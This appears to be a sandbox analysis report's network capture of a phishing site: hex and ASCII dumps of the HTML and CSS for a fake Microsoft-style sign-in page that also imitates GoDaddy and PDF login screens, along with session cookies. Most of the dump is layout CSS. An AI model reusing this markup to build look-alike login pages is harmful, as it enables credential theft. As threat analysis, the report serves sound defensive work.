                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblg
                          2024-05-22 15:57:20 UTC382INData Raw: 31 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 36 2e 30 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 3e 3c 2f
                          Data Ascii: 177<!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdn.socket.io/4.6.0/socket.io.min.js"></script> <script src="https://www.google.com/recaptcha/api.js"></
                          2024-05-22 15:57:20 UTC1369INData Raw: 36 61 39 37 0d 0a 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 70 71 30 68 41 49 37 71 78 53 63 78 38 37 79 7a 66 58 77 78 34 30 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 31 32 42 55 72 4d 47 4a 51 35 4f 4f 64 7a 37 38 6a 69 39 54 6e 35 75 51 6f 70 35 30 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72
                          Data Ascii: 6a97 <link rel="preload" href="pq0hAI7qxScx87yzfXwx40" as="font" type="font/woff2" crossorigin="anonymous"> <link rel="preload" href="12BUrMGJQ5OOdz78ji9Tn5uQop50" as="font" type="font/woff" crossorigin="anonymous"> <link rel="preload" hr
                          2024-05-22 15:57:20 UTC1369INData Raw: 2d 63 6f 6c 6f 72 3a 20 23 30 30 36 37 62 38 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 36 37 62 38 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 33 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 62 74 6e 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 36 37 62 38 3b 0d 0a
                          Data Ascii: -color: #0067b8; color: #fff; border: 2px solid #0067b8; padding: 5px 30px; font-size: 15px; cursor: pointer; } .btn:hover { background-color: #0067b8;
                          2024-05-22 15:57:20 UTC1369INData Raw: 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f
                          Data Ascii: t-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> <div class="dot-flo
                          2024-05-22 15:57:20 UTC1369INData Raw: 4d 69 67 6a 54 47 4f 44 68 6d 31 32 31 33 30 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 20 6d 62 2d 31 36 20 6d 74 2d 31 36 22 3e 53 69 67 6e 20 69 6e 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 2d 31 36 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 5f 75 6e 61 6d 65 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 6e 70 5f 75 6e 61 6d 65 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e
                          Data Ascii: MigjTGODhm12130"/> </button> <h2 class="title mb-16 mt-16">Sign in</h2> <div class="mb-16"> <div id="error_uname" class="error"></div> <input id="inp_uname" type="text" n
                          2024-05-22 15:57:20 UTC1369INData Raw: 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d
                          Data Ascii: t-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> </div> <div class="sectioncontent"> <div class=
                          2024-05-22 15:57:20 UTC1369INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                          Data Ascii: div class="dot-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> </div>
                          2024-05-22 15:57:20 UTC1369INData Raw: 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 31 36 20 66 73 2d 31 33 22 3e 4e 6f 20 61 63 63 6f 75 6e 74 3f 20 3c 61 20 68 72 65 66 3d 22 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 22 3e 43 72 65 61 74 65 20 6f 6e 65 21 3c 2f 61 3e 3c 2f 70 3e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 0d 0a 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 73 65 63 74 69 6f 6e 5f 74 72 79
                          Data Ascii: </div> <div class="bottomsection"> </div> ... <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p> --> </div> </div> </section> <section id="section_try
                          2024-05-22 15:57:20 UTC1369INData Raw: 69 76 20 69 64 3d 22 6d 6f 72 65 69 6e 66 6f 22 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 62 6f 64 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 59 6f 75 72 20 41 63 63 6f 75 6e 74 20 52 65 71 75 69 72 65 73 20 4d 6f 72 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 3c 62 72 3e 3c 61 20 68 72 65 66 3d 22 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 6d 62 2d 31 36 22 3e 54 72 79 20 41 67 61 69 6e 2e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 6d 62 2d 31 36 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31
                          Data Ascii: iv id="moreinfo" class="row text-body" style="display:none;margin-bottom: 0;"> Your Account Requires More Information. <br><a href="" class="link mb-16">Try Again.</a> </div> <a class="link mb-16" style="font-size: 1


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.449771188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:21 UTC1373OUTGET /56rssvHl2yrWrn4cdsVelZ8918 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:22 UTC638INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:22 GMT
                          Content-Type: text/css;charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Content-Disposition: inline; filename="56rssvHl2yrWrn4cdsVelZ8918"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuj3Q6MnrKGDH%2FMrzo2I%2FuJuGknwNYbiy8yD91myZFHsFMfnwmqd5E2tPiieHw0QCMyDr1dZ6wPvGm8e4hVeIvsuhrzcqk0DCBa%2BVlszNL54aqFnu0AA2SjC6F6iMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e005fdc65186d-EWR
                          2024-05-22 15:57:22 UTC731INData Raw: 31 35 63 30 0d 0a 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 61 67 65 4e 61 6d 65 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e
                          Data Ascii: 15c0*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.
                          2024-05-22 15:57:22 UTC1369INData Raw: 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 61 7b
                          Data Ascii: ","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{
                          2024-05-22 15:57:22 UTC1369INData Raw: 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 74 72 61 6e 73 66
                          Data Ascii: 0%;background:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .lds-spinner div:first-child{transform:rotate(0);animation-delay:-1.1s}#sections_pdf .lds-spinner div:nth-child(2){transf
                          2024-05-22 15:57:22 UTC1369INData Raw: 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f
                          Data Ascii: d:rgba(0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:relative;margin-top:30px;margin-left:auto;margin-right:auto;width:100%;display:flex;justify-content:center;flex-directio
                          2024-05-22 15:57:22 UTC738INData Raw: 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32 30 38 33 33 33 33 69 6e 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 3a 68 6f 76 65 72 2c 2e 62 61 63 6b 3a 68 6f 76 65 72 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20
                          Data Ascii: tems:center;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052083333in}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}#sections_pdf
                          2024-05-22 15:57:22 UTC1369INData Raw: 32 31 66 30 0d 0a 65 63 74 50 72 6f 76 69 64 65 72 7b 64 69 73 70 6c 61 79 3a 67 72 69 64 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 61 75 74 6f 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 23 70 64 66 6c 6f 67 69 6e 6c 6f 67 6f 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 20 61 75 74 6f 20 31 30 70 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 65 6d 61 69 6c 62 6c 6f 63 6b 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f
                          Data Ascii: 21f0ectProvider{display:grid;grid-template-columns:auto;justify-content:center;align-content:center}#sections_pdf .login .selectProvider #pdfloginlogo{margin:auto auto 10px}#sections_pdf .login .selectProvider .emailblock,#sections_pdf .login .selectPro
                          2024-05-22 15:57:22 UTC1369INData Raw: 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 70 61 73 73 69 6e 70 75 74 66 69 65 6c 64 3e 69 6e 70 75 74 7b 77 69 64 74 68 3a 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 73 65 72 76 69 63 65 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 34 39 38 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d
                          Data Ascii: f .login .selectProvider .passinputfield>input{width:auto;height:35px;font-size:18px;padding-left:10px;border-radius:5px;border:none;letter-spacing:1px}#sections_pdf .login .selectProvider .servicelabel{color:rgba(255,255,255,.498);text-align:center;font-
                          2024-05-22 15:57:22 UTC1369INData Raw: 30 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 6f 74 74 6f 6d 3a 34 30 70 78 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2b 20 31 31 30 70 78 29 3b 72 69 67 68 74 3a 36 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74
                          Data Ascii: 0}to{transform:translateX(0);opacity:1}}#sections .loading-container{display:flex;align-items:center;width:100%;height:100%;bottom:40px;width:calc(100% + 110px);right:60px;position:relative}#sections .loading-container.loading .dot-floating{position:relat
                          2024-05-22 15:57:22 UTC1369INData Raw: 68 74 3a 31 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 23 73 65 63 74 69 6f 6e 73 20 2e 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 23 73 65 63 74 69 6f 6e 73 20 23 61 63 63 65 73 73 62 6c 6f 63 6b 65 64 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 63 6f 6e 74 65 6e 74 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 2e 72 6f 77 2e 74 69 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 3a 66 69 72 73 74 2d 63 68 69 6c 64 2b 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 2e 77 2d 31 30 30 7b 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 20 2e 64 65 62 75 67 2d 64 65 74 61 69 6c 73 2d 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 23 73 65 63 74 69 6f 6e 73 20 2e 64 65 62 75 67
